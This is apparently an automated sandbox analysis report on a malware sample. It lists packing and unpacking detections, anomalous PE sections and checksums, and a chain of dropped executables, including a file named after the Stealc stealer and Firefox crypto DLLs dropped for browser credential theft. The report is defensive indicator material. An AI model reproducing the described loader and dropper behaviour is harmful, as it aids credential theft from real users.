Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: soonmaintain.exe, 00000019.00000002.3781370617.000001C5A5D40000.00000004.00000800.00020000.00000000.sdmp, soonmaintain.exe, 00000019.00000002.3781370617.000001C5A5C81000.00000004.00000800.00020000.00000000.sdmp, soonmaintain.exe, 00000019.00000002.3787425416.000001C5AE710000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: soonmaintain.exe, 00000019.00000002.3786211407.000001C5AE6C0000.00000004.08000000.00040000.00000000.sdmp, soonmaintain.exe, 00000019.00000002.3781370617.000001C5A5C08000.00000004.00000800.00020000.00000000.sdmp, soonmaintain.exe, 00000019.00000002.3781370617.000001C5A5C81000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: mozglue.pdb source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3164958617.000000006F86D000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: 52ba7a538c.exe, 00000014.00000002.3410807562.0000000001F12000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: soonmaintain.exe, 00000019.00000002.3786211407.000001C5AE6C0000.00000004.08000000.00040000.00000000.sdmp, soonmaintain.exe, 00000019.00000002.3781370617.000001C5A5C08000.00000004.00000800.00020000.00000000.sdmp, soonmaintain.exe, 00000019.00000002.3781370617.000001C5A5C81000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Unpacked PE file: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack :EW;.rsrc:W;.idata :W;hsfspruu:EW;ilcadzlg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hsfspruu:EW;ilcadzlg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Unpacked PE file: 5.2.4XVI62Q28CHMU2Y2V4F8.exe.980000.0.unpack :EW;.rsrc:W;.idata :W;bwzzahtg:EW;rhjmaeag:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;bwzzahtg:EW;rhjmaeag:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 6.2.skotes.exe.e40000.0.unpack :EW;.rsrc:W;.idata :W;bwzzahtg:EW;rhjmaeag:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;bwzzahtg:EW;rhjmaeag:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 7.2.skotes.exe.e40000.0.unpack :EW;.rsrc:W;.idata :W;bwzzahtg:EW;rhjmaeag:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;bwzzahtg:EW;rhjmaeag:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 11.2.skotes.exe.e40000.0.unpack :EW;.rsrc:W;.idata :W;bwzzahtg:EW;rhjmaeag:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;bwzzahtg:EW;rhjmaeag:EW;.taggant:EW;
Source: C:\Users\user\Documents\FIJECAEHJJ.exe	Unpacked PE file: 19.2.FIJECAEHJJ.exe.7b0000.0.unpack :EW;.rsrc:W;.idata :W;bwzzahtg:EW;rhjmaeag:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;bwzzahtg:EW;rhjmaeag:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Unpacked PE file: 21.2.5fe60d6c80.exe.f70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;csnwaitg:EW;civfgwbo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;csnwaitg:EW;civfgwbo:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 22.2.axplong.exe.e30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;csnwaitg:EW;civfgwbo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;csnwaitg:EW;civfgwbo:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 23.2.axplong.exe.e30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;csnwaitg:EW;civfgwbo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;csnwaitg:EW;civfgwbo:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Unpacked PE file: 27.2.k0ukcEH.exe.9d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dqaezxce:EW;znjwjjbm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dqaezxce:EW;znjwjjbm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 53.2.axplong.exe.e30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;csnwaitg:EW;civfgwbo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;csnwaitg:EW;civfgwbo:EW;.taggant:EW;

Yara detected Costura Assembly Loader

Source: Yara match	File source: 25.2.soonmaintain.exe.1c5ae540000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.3734030557.000001C595C74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3784671857.000001C5AE540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: soonmaintain.exe PID: 1488, type: MEMORYSTR

Source: ukX1YE2[1].exe.11.dr

Static PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: 4XVI62Q28CHMU2Y2V4F8.exe.0.dr	Static PE information: real checksum: 0x31ccd3 should be: 0x323787
Source: random[2].exe.3.dr	Static PE information: real checksum: 0x31ccd3 should be: 0x323787
Source: fe4b3524c6.exe.11.dr	Static PE information: real checksum: 0x446ba9 should be: 0x449cb0
Source: 5fe60d6c80.exe.11.dr	Static PE information: real checksum: 0x1d14b0 should be: 0x1dc46f
Source: 5f7e5e6f99.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x8a12b
Source: hmUaBuJ.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x37a75
Source: soonmaiintain.exe.24.dr	Static PE information: real checksum: 0x0 should be: 0x1999b3
Source: hmUaBuJ[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x37a75
Source: UfEglUg.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x8c003
Source: random[1].exe1.11.dr	Static PE information: real checksum: 0x1d5611 should be: 0x1d0e9b
Source: Y71AV1VIPLT8Y663WBDXSB.exe.0.dr	Static PE information: real checksum: 0x4f2893 should be: 0x4f5a27
Source: random[1].exe.11.dr	Static PE information: real checksum: 0x1d14b0 should be: 0x1dc46f
Source: UfEglUg[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x8c003
Source: 98f8ef74ec.exe.11.dr	Static PE information: real checksum: 0x1cecb1 should be: 0x1db344
Source: FIJECAEHJJ.exe.3.dr	Static PE information: real checksum: 0x31ccd3 should be: 0x323787
Source: random[4].exe0.11.dr	Static PE information: real checksum: 0x1cecb1 should be: 0x1db344
Source: dea82620d5.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x88ff0
Source: t0IHakP.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x2e694
Source: random[3].exe0.11.dr	Static PE information: real checksum: 0x96863 should be: 0x1b7fd3
Source: axplong.exe.21.dr	Static PE information: real checksum: 0x1d14b0 should be: 0x1dc46f
Source: random[2].exe0.11.dr	Static PE information: real checksum: 0x0 should be: 0x8a12b
Source: random[1].exe0.11.dr	Static PE information: real checksum: 0x0 should be: 0x88ff0
Source: i8Vwc7iOaG.exe	Static PE information: real checksum: 0x1c8376 should be: 0x1c88bc
Source: k0ukcEH[1].exe.11.dr	Static PE information: real checksum: 0x1cecb1 should be: 0x1db344
Source: t0IHakP[1].exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x2e694
Source: 7d66ff7c35.exe.11.dr	Static PE information: real checksum: 0x2e58ac should be: 0x2dfedd
Source: k0ukcEH.exe.11.dr	Static PE information: real checksum: 0x1cecb1 should be: 0x1db344
Source: random[5].exe.11.dr	Static PE information: real checksum: 0x446ba9 should be: 0x449cb0
Source: skotes.exe.5.dr	Static PE information: real checksum: 0x31ccd3 should be: 0x323787
Source: 5f4a2ffa3a.exe.11.dr	Static PE information: real checksum: 0x96863 should be: 0x1b7fd3
Source: fd096224d5.exe.11.dr	Static PE information: real checksum: 0x1d5611 should be: 0x1d0e9b
Source: random[4].exe.11.dr	Static PE information: real checksum: 0x2e58ac should be: 0x2dfedd

Source: i8Vwc7iOaG.exe	Static PE information: section name:
Source: i8Vwc7iOaG.exe	Static PE information: section name: .idata
Source: i8Vwc7iOaG.exe	Static PE information: section name:
Source: i8Vwc7iOaG.exe	Static PE information: section name: niowkeag
Source: i8Vwc7iOaG.exe	Static PE information: section name: uicdnwsx
Source: i8Vwc7iOaG.exe	Static PE information: section name: .taggant
Source: Y71AV1VIPLT8Y663WBDXSB.exe.0.dr	Static PE information: section name:
Source: Y71AV1VIPLT8Y663WBDXSB.exe.0.dr	Static PE information: section name: .idata
Source: Y71AV1VIPLT8Y663WBDXSB.exe.0.dr	Static PE information: section name: hsfspruu
Source: Y71AV1VIPLT8Y663WBDXSB.exe.0.dr	Static PE information: section name: ilcadzlg
Source: Y71AV1VIPLT8Y663WBDXSB.exe.0.dr	Static PE information: section name: .taggant
Source: 4XVI62Q28CHMU2Y2V4F8.exe.0.dr	Static PE information: section name:
Source: 4XVI62Q28CHMU2Y2V4F8.exe.0.dr	Static PE information: section name: .idata
Source: 4XVI62Q28CHMU2Y2V4F8.exe.0.dr	Static PE information: section name: bwzzahtg
Source: 4XVI62Q28CHMU2Y2V4F8.exe.0.dr	Static PE information: section name: rhjmaeag
Source: 4XVI62Q28CHMU2Y2V4F8.exe.0.dr	Static PE information: section name: .taggant
Source: freebl3.dll.3.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.3.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.3.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.3.dr	Static PE information: section name: .didat
Source: nss3.dll.3.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.3.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: random[2].exe.3.dr	Static PE information: section name:
Source: random[2].exe.3.dr	Static PE information: section name: .idata
Source: random[2].exe.3.dr	Static PE information: section name: bwzzahtg
Source: random[2].exe.3.dr	Static PE information: section name: rhjmaeag
Source: random[2].exe.3.dr	Static PE information: section name: .taggant
Source: FIJECAEHJJ.exe.3.dr	Static PE information: section name:
Source: FIJECAEHJJ.exe.3.dr	Static PE information: section name: .idata
Source: FIJECAEHJJ.exe.3.dr	Static PE information: section name: bwzzahtg
Source: FIJECAEHJJ.exe.3.dr	Static PE information: section name: rhjmaeag
Source: FIJECAEHJJ.exe.3.dr	Static PE information: section name: .taggant
Source: skotes.exe.5.dr	Static PE information: section name:
Source: skotes.exe.5.dr	Static PE information: section name: .idata
Source: skotes.exe.5.dr	Static PE information: section name: bwzzahtg
Source: skotes.exe.5.dr	Static PE information: section name: rhjmaeag
Source: skotes.exe.5.dr	Static PE information: section name: .taggant
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: .idata
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: csnwaitg
Source: random[1].exe.11.dr	Static PE information: section name: civfgwbo
Source: random[1].exe.11.dr	Static PE information: section name: .taggant
Source: 5fe60d6c80.exe.11.dr	Static PE information: section name:
Source: 5fe60d6c80.exe.11.dr	Static PE information: section name: .idata
Source: 5fe60d6c80.exe.11.dr	Static PE information: section name:
Source: 5fe60d6c80.exe.11.dr	Static PE information: section name: csnwaitg
Source: 5fe60d6c80.exe.11.dr	Static PE information: section name: civfgwbo
Source: 5fe60d6c80.exe.11.dr	Static PE information: section name: .taggant
Source: k0ukcEH[1].exe.11.dr	Static PE information: section name:
Source: k0ukcEH[1].exe.11.dr	Static PE information: section name: .idata
Source: k0ukcEH[1].exe.11.dr	Static PE information: section name:
Source: k0ukcEH[1].exe.11.dr	Static PE information: section name: dqaezxce
Source: k0ukcEH[1].exe.11.dr	Static PE information: section name: znjwjjbm
Source: k0ukcEH[1].exe.11.dr	Static PE information: section name: .taggant
Source: k0ukcEH.exe.11.dr	Static PE information: section name:
Source: k0ukcEH.exe.11.dr	Static PE information: section name: .idata
Source: k0ukcEH.exe.11.dr	Static PE information: section name:
Source: k0ukcEH.exe.11.dr	Static PE information: section name: dqaezxce
Source: k0ukcEH.exe.11.dr	Static PE information: section name: znjwjjbm
Source: k0ukcEH.exe.11.dr	Static PE information: section name: .taggant
Source: random[3].exe.11.dr	Static PE information: section name: .fptable
Source: a9afbb531e.exe.11.dr	Static PE information: section name: .fptable
Source: random[4].exe.11.dr	Static PE information: section name:
Source: random[4].exe.11.dr	Static PE information: section name: .rsrc
Source: random[4].exe.11.dr	Static PE information: section name: .idata
Source: random[4].exe.11.dr	Static PE information: section name: xkuacxgz
Source: random[4].exe.11.dr	Static PE information: section name: pzmqirjh
Source: random[4].exe.11.dr	Static PE information: section name: .taggant
Source: 7d66ff7c35.exe.11.dr	Static PE information: section name:
Source: 7d66ff7c35.exe.11.dr	Static PE information: section name: .rsrc
Source: 7d66ff7c35.exe.11.dr	Static PE information: section name: .idata
Source: 7d66ff7c35.exe.11.dr	Static PE information: section name: xkuacxgz
Source: 7d66ff7c35.exe.11.dr	Static PE information: section name: pzmqirjh
Source: 7d66ff7c35.exe.11.dr	Static PE information: section name: .taggant
Source: random[5].exe.11.dr	Static PE information: section name:
Source: random[5].exe.11.dr	Static PE information: section name: .idata
Source: random[5].exe.11.dr	Static PE information: section name:
Source: random[5].exe.11.dr	Static PE information: section name: jbmcqnop
Source: random[5].exe.11.dr	Static PE information: section name: sxtwdxzr
Source: random[5].exe.11.dr	Static PE information: section name: .taggant
Source: fe4b3524c6.exe.11.dr	Static PE information: section name:
Source: fe4b3524c6.exe.11.dr	Static PE information: section name: .idata
Source: fe4b3524c6.exe.11.dr	Static PE information: section name:
Source: fe4b3524c6.exe.11.dr	Static PE information: section name: jbmcqnop
Source: fe4b3524c6.exe.11.dr	Static PE information: section name: sxtwdxzr
Source: fe4b3524c6.exe.11.dr	Static PE information: section name: .taggant
Source: random[4].exe0.11.dr	Static PE information: section name:
Source: random[4].exe0.11.dr	Static PE information: section name: .idata
Source: random[4].exe0.11.dr	Static PE information: section name:
Source: random[4].exe0.11.dr	Static PE information: section name: dqaezxce
Source: random[4].exe0.11.dr	Static PE information: section name: znjwjjbm
Source: random[4].exe0.11.dr	Static PE information: section name: .taggant
Source: 98f8ef74ec.exe.11.dr	Static PE information: section name:
Source: 98f8ef74ec.exe.11.dr	Static PE information: section name: .idata
Source: 98f8ef74ec.exe.11.dr	Static PE information: section name:
Source: 98f8ef74ec.exe.11.dr	Static PE information: section name: dqaezxce
Source: 98f8ef74ec.exe.11.dr	Static PE information: section name: znjwjjbm
Source: 98f8ef74ec.exe.11.dr	Static PE information: section name: .taggant
Source: random[1].exe1.11.dr	Static PE information: section name:
Source: random[1].exe1.11.dr	Static PE information: section name: .idata
Source: random[1].exe1.11.dr	Static PE information: section name:
Source: random[1].exe1.11.dr	Static PE information: section name: rnotmvkb
Source: random[1].exe1.11.dr	Static PE information: section name: hsvghaut
Source: random[1].exe1.11.dr	Static PE information: section name: .taggant
Source: fd096224d5.exe.11.dr	Static PE information: section name:
Source: fd096224d5.exe.11.dr	Static PE information: section name: .idata
Source: fd096224d5.exe.11.dr	Static PE information: section name:
Source: fd096224d5.exe.11.dr	Static PE information: section name: rnotmvkb
Source: fd096224d5.exe.11.dr	Static PE information: section name: hsvghaut
Source: fd096224d5.exe.11.dr	Static PE information: section name: .taggant
Source: random[1].exe2.11.dr	Static PE information: section name: .symtab
Source: 52ba7a538c.exe.11.dr	Static PE information: section name: .symtab
Source: axplong.exe.21.dr	Static PE information: section name:
Source: axplong.exe.21.dr	Static PE information: section name: .idata
Source: axplong.exe.21.dr	Static PE information: section name:
Source: axplong.exe.21.dr	Static PE information: section name: csnwaitg
Source: axplong.exe.21.dr	Static PE information: section name: civfgwbo
Source: axplong.exe.21.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Code function: 0_3_0125E728 push eax; ret	0_3_0125E72C
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Code function: 0_3_0125E728 push eax; ret	0_3_0125E72C
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Code function: 0_3_0125CF64 pushad ; iretd	0_3_0125CF65
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Code function: 0_3_0125CF64 pushad ; iretd	0_3_0125CF65
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Code function: 0_3_012635C9 pushfd ; iretd	0_3_012635D9
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Code function: 0_3_012635C9 pushfd ; iretd	0_3_012635D9
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Code function: 0_3_012609D9 pushfd ; iretd	0_3_012609E9
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Code function: 0_3_012609D9 pushfd ; iretd	0_3_012609E9
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Code function: 0_3_0125E728 push eax; ret	0_3_0125E72C
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Code function: 0_3_0125E728 push eax; ret	0_3_0125E72C
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Code function: 0_3_0125CF64 pushad ; iretd	0_3_0125CF65
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Code function: 0_3_0125CF64 pushad ; iretd	0_3_0125CF65
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Code function: 0_3_012635C9 pushfd ; iretd	0_3_012635D9
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Code function: 0_3_012635C9 pushfd ; iretd	0_3_012635D9
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Code function: 0_3_012609D9 pushfd ; iretd	0_3_012609E9
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Code function: 0_3_012609D9 pushfd ; iretd	0_3_012609E9
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Code function: 0_3_012CB528 pushad ; iretd	0_3_012CB537
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Code function: 0_3_012CB523 pushad ; iretd	0_3_012CB537
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Code function: 0_3_012CF0D1 push ecx; iretd	0_3_012CF0D2
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Code function: 0_3_012CF8D1 push eax; iretd	0_3_012CF8D2

Source: i8Vwc7iOaG.exe	Static PE information: section name: entropy: 7.985609217833421
Source: i8Vwc7iOaG.exe	Static PE information: section name: niowkeag entropy: 7.952683580033328
Source: 4XVI62Q28CHMU2Y2V4F8.exe.0.dr	Static PE information: section name: entropy: 7.08781017739627
Source: random[2].exe.3.dr	Static PE information: section name: entropy: 7.08781017739627
Source: FIJECAEHJJ.exe.3.dr	Static PE information: section name: entropy: 7.08781017739627
Source: skotes.exe.5.dr	Static PE information: section name: entropy: 7.08781017739627
Source: random[1].exe.11.dr	Static PE information: section name: entropy: 7.9865365952427565
Source: random[1].exe.11.dr	Static PE information: section name: csnwaitg entropy: 7.954536346351251
Source: 5fe60d6c80.exe.11.dr	Static PE information: section name: entropy: 7.9865365952427565
Source: 5fe60d6c80.exe.11.dr	Static PE information: section name: csnwaitg entropy: 7.954536346351251
Source: k0ukcEH[1].exe.11.dr	Static PE information: section name: entropy: 7.973472410629367
Source: k0ukcEH[1].exe.11.dr	Static PE information: section name: dqaezxce entropy: 7.95378805537375
Source: k0ukcEH.exe.11.dr	Static PE information: section name: entropy: 7.973472410629367
Source: k0ukcEH.exe.11.dr	Static PE information: section name: dqaezxce entropy: 7.95378805537375
Source: random[4].exe.11.dr	Static PE information: section name: entropy: 7.97845575818733
Source: 7d66ff7c35.exe.11.dr	Static PE information: section name: entropy: 7.97845575818733
Source: random[5].exe.11.dr	Static PE information: section name: jbmcqnop entropy: 7.955312856107021
Source: fe4b3524c6.exe.11.dr	Static PE information: section name: jbmcqnop entropy: 7.955312856107021
Source: random[4].exe0.11.dr	Static PE information: section name: entropy: 7.973472410629367
Source: random[4].exe0.11.dr	Static PE information: section name: dqaezxce entropy: 7.95378805537375
Source: 98f8ef74ec.exe.11.dr	Static PE information: section name: entropy: 7.973472410629367
Source: 98f8ef74ec.exe.11.dr	Static PE information: section name: dqaezxce entropy: 7.95378805537375
Source: random[1].exe1.11.dr	Static PE information: section name: entropy: 7.970494140350655
Source: random[1].exe1.11.dr	Static PE information: section name: rnotmvkb entropy: 7.954244764810551
Source: fd096224d5.exe.11.dr	Static PE information: section name: entropy: 7.970494140350655
Source: fd096224d5.exe.11.dr	Static PE information: section name: rnotmvkb entropy: 7.954244764810551
Source: axplong.exe.21.dr	Static PE information: section name: entropy: 7.9865365952427565
Source: axplong.exe.21.dr	Static PE information: section name: csnwaitg entropy: 7.954536346351251
Source: soonmaiintain.exe.24.dr	Static PE information: section name: .text entropy: 7.368805778909753

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe

File created: C:\Users\user\Documents\FIJECAEHJJ.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\hmUaBuJ[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1022819001\hmUaBuJ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1023286001\5f4a2ffa3a.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_valenciga[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1008788001\projectspecificpro.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1023279001\a9afbb531e.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaiintain.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1004899001\am209.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\legs[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1008943001\28c520debd.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[4].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1023284001\5f7e5e6f99.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\goldddd123[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1001527001\legs.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\am209[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File created: C:\Users\user\Documents\FIJECAEHJJ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\k0ukcEH[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1006343001\goldddd123.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
